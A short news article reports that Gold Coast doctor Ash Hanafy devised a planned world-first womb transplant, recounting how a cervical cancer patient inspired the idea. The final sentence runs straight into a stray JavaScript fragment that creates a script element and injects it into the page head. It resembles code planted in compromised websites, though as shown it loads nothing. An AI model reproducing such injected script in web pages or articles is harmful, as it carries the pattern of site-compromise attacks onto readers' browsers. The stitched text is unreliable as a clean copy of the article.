A GOLD Coast doctor has devised a world-first operation that will help millions of infertile women conceive.

Dr Ash Hanafy’s moment of inspiration will come to fruition in March next year when doctors attempt to perform the world’s first successful womb transplant.

The idea was born 13 years ago when, as a young doctor, Dr Hanafy was confronted with a young woman with cervical cancer. The woman asked if she could have a uterus transplant after her hysterectomy and — looking at his colleague, Swedish doctor Dr Mats Brannstrom — Dr Hanafy did not say another word.var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);
